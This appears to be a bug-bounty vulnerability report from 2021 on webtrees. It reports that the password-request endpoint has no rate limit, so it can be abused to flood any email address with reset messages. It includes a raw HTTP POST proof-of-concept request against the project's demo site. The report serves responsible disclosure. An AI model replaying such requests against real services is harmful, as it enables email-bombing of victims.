Insufficient Granularity of Access Control in fisharebest/webtrees
Valid
Reported on
Sep 29th 2021
Description
There is not rate limit protection , Rate limit bypass sent unlimited email victim or any email address.
Proof of Concept
There is no rate limit password-request , attacker to send unlimited email to victim or any email address.
POST /demo-stable/index.php?route=%2Fdemo-stable%2Fpassword-request%2Fdemo HTTP/1.1
Host: dev.webtrees.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://dev.webtrees.net/
Content-Type: application/x-www-form-urlencoded
Content-Length: 69
Origin: https://dev.webtrees.net
Connection: close
Cookie: __Secure-WT-ID=sdh1q5pp24lj80hqqkvqqauamg
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
_csrf=afa1QzzcSWAUPfgp1FOXBUWn14DtoVru&email=aravindtestx%40gmail.com
Post data email= parameter value to victim mail. this request unlimited time and victim email address will received unlimited verification email .
Impact
Attacker can sent unlimited email to any mail address
Occurrences
We have contacted a member of the
fisharebest/webtrees
team and are waiting to hear back
2 years ago
PasswordRequestAction.php#L22-L52
has been validated
to join this conversation